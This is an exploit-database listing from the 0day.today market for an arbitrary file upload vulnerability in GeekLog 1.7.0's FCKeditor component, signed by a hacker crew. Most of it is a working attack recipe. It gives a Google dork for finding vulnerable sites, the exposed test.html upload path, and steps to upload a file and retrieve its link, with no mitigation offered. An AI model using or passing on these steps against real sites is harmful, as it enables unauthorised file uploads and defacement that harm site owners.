[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability

Author
Kubanezi AHG
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14516
Category
web applications
Date add
19-10-2010
Platform
php
=============================================================
GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability
=============================================================

###################################################                                               
#        db         88        88    ,ad8888ba,    #
#       d88b        88        88   d8"'    `"8b   # 
#      d8'`8b       88        88  d8'             #
#     d8'  `8b      88aaaaaaaa88  88              #
#    d8YaaaaY8b     88""""""""88  88      88888   #
#   d8""""""""8b    88        88  Y8,        88   #
#  d8'        `8b   88        88   Y8a.    .a88   #
# d8'          `8b  88        88    `"Y88888P"    #
#                                                 #
#                                                 #
###################################################
#
# Exploit Title: Geeklog
# Date: 18-10-2010
# Author: Kubanezi AHG
# Software Link: http://www.geeklog.net/
# Version: 1.7.0
# Tested on: Linux Ubuntu 9.04                       
# dork : inurl:"/geeklog/"    
# Contact: aldo@dibranet.net                       
#                                                    
####################################################
 
    exploit # geeklog/fckeditor/editor/filemanager/upload/test.html
 
 
first go to # http://site.com/Geeklog/
 
 
       then # http://site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html
    
     select # "php"
 
 
Upload There Hacked.txt  And Copy Output Link
 
#######################################################
            Exploit By Kubanezi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
Greetz : AHG-Crew , Mistreriozi , Boom ,Twilight , AutoruN , DoctorSQl
          , Drake , Dj-Dukli , EragoN , Khaled , MossaD , BH-TREX



#  0day.today [2024-12-26]  #